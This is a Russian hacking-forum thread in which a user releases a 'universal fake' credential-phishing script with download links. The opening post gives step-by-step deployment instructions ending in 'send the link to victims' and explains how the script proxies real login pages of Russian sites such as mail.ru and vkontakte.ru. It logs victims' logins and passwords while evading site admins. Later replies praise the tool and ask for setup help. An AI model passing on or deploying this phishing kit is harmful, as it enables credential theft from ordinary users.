Ponchik's universal fake v1.0

Discussion in 'Уязвимости' started by Ponchik, 12 Feb 2009.

  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Эммм... Честно говоря вобще не нащёл куда положить это, но кажись в уязвимостях более менее смотриться...
    Так вот, предлагаю вам универсальный фейк :)
    Ложим его на хостинг с сокетами, пишем в него сайт, проксики для работы и он сам всё сделает, вот..
    Придумал такое не я, предложили реализовать идею, я её токо реализовывал :)
    Code:
    http://dump.ru/file/1532414
    http://rapidshare.com/files/197209760/multi_fake.rar.html
    http://slil.ru/26637882
    Заливаем на хостинг
    Выставляем права на файл логов и конфиг
    Заходим на скрипт фейка
    Заполняем в него инфу
    Рассылаем ссыль жертвам
    #если нехотите юзать прокси пишите сайт, тоесть если фей для torrents.ru в прокси пишем torrents.ru:80

    В отличии от фейка "Anyfake" бузи кодера мой использует прокси и в связи с этим не палится админами сайта по рефереру, т.к. картинки идут через прокси тоже

    Как это работает?
    Когда юзер заходит на фейк, скрипт проверяет существование файла настроек, если файл пустой или не существует, выводится страница настройки.
    После того как всё настроено, скрипт проверяет ввел пользователь и логин и пароль или нет? Если ввел, тогда скрипт записывает время, IP, логин и пароль в файл-лог, который был указан при настройке скрипта и пользователя перекидывает на страницу входа, которая также была указана при настройке.
    Если пользователь ничего не ввел, тогда из списка прокси серверов (тоже указанных при настройке скрипта) случайным образом выбирается 1 прокси сервер. Далее скрипт проверяет это запрос пользователя на фейк, или фейка на получение картинок и другого контента, если это пользователь, то скрипт посылает на прокси сервер запрос для получения страницы входа, которая указана в настройках (если прокси "мёртвый" скрипт записывает сообщение об этом в лог-файл) после получения страницы, скрипт обрабатывает её для изменения адресов картинок и форм для перехвата информации введённой пользователем. Также скрипт получает кодировку которая пришла в странице и отдаёт её пользователю, чтобы текст нормально отображался.

    Примеры фейков:
    torrents.ru
    [​IMG]

    mail.ru
    [​IMG]

    vkontakte.ru
    [​IMG]

    odnoklassniki.ru
    [​IMG]

    UPD
    Фейк попал в журнал ксакепа :cool:
    [​IMG]
     
    #1 Ponchik, 12 Feb 2009
    Last edited: 25 Mar 2009
    19 people like this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    энифейк от Бузикодера не так же работает?
     
  3. .W

    .W Elder - Старейшина

    Joined:
    9 Aug 2007
    Messages:
    177
    Likes Received:
    228
    Reputations:
    33
    Красавчег)
    Как всегда хорошая работа
     
  4. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    iddqd, эээээ? Ану покажи
     
  5. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    http://forum.antichat.ru/showthread.php?t=44845
    хотя я хз, как оно работатет, не пробовал
     
  6. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    iddqd, ну вот имаги он напрямую выдаёт, чёто CSS вобще повырезал =\ Ну хз, может у мя чёто нетак...
    Ну думайте сами чё юзать
     
    1 person likes this.
  7. Faxford

    Faxford New Member

    Joined:
    15 Aug 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Почему у меня файил fake.php в опере открывается не как надо?
    [​IMG]
     
  8. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Faxford, даж незнаю плакать или смеяться...
    тебе PHP нужен
     
    1 person likes this.
  9. Faxford

    Faxford New Member

    Joined:
    15 Aug 2008
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Ну я тип понял... а как его сделать? =\
     
  10. hidden0123

    hidden0123 Banned

    Joined:
    4 Feb 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Faxford, ты хоть Apache поставь... А то у тебя так ничего не получится :)

    Вот самый обычный его комплект (не требует возни в настройках) _http://dodownload.filefront.com/7377938//2622c7b2ee1c92b8c2dde3451f2289f8d547f4be535b0a3233a812dbb1200e66fecdfd6f6beff8b5
     
  11. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    hidden0123, оно ему надо? Ну поставит он, не удалит пых пых админ, его хекнут =\
    Так мало того чем ему это поможет? Думаеш у него вдруг появятся знания и он зальёт куда-то этот фейк и будет юзать? Сомневааааюсь
     
    1 person likes this.
  12. hidden0123

    hidden0123 Banned

    Joined:
    4 Feb 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Ponchik, согласен :) Но пусь висит пост, може кому ссылка понадобиться :)
     
  13. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    ponchik возникла проблемка.
    Всё делаю правильно но фейк не грузится !
     
    _________________________
  14. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    делай руками
     
  15. Iohid

    Iohid Member

    Joined:
    18 Jul 2009
    Messages:
    27
    Likes Received:
    29
    Reputations:
    6
    ламерский вопрос какие права нужно ставить
     
  16. Chubakur

    Chubakur Member

    Joined:
    6 Apr 2009
    Messages:
    48
    Likes Received:
    12
    Reputations:
    0
    777 не катит?
     
  17. Iohid

    Iohid Member

    Joined:
    18 Jul 2009
    Messages:
    27
    Likes Received:
    29
    Reputations:
    6
    неа